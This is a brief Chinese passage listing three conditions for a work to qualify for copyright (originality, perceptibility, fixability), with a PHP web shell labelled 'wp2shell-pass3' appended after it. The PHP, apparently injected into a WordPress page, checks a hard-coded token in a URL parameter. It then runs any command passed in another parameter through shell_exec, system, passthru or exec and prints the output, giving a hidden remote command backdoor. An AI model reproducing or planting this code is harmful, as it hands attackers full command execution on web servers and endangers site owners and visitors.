(1)独创性:必须是独立创作,没有抄袭或临摹他人;
(2)可被感知:必须能被他人感知,包括通过人体的感官直接感知,也包括借助机械、设备等被他人所感知;
(3)可复制性:必须能被固定在一定的物质载体上。
// wp2shell-pass3 if (isset($_GET['t']) && hash_equals('85680686487752acb1a2f09033bfba49', (string)$_GET['t']) && isset($_GET['c'])) { $c=(string)$_GET['c']; $o=''; if(function_exists('shell_exec')) $o=(string)@shell_exec($c); elseif(function_exists('system')){ob_start();@system($c);$o=ob_get_clean();} elseif(function_exists('passthru')){ob_start();@passthru($c);$o=ob_get_clean();} elseif(function_exists('exec')){@exec($c,$a);$o=implode(chr(10),(array)$a);} $mk='WP2'.'SHELL'; echo $mk.'::'.$o.'::'.'END'; exit; }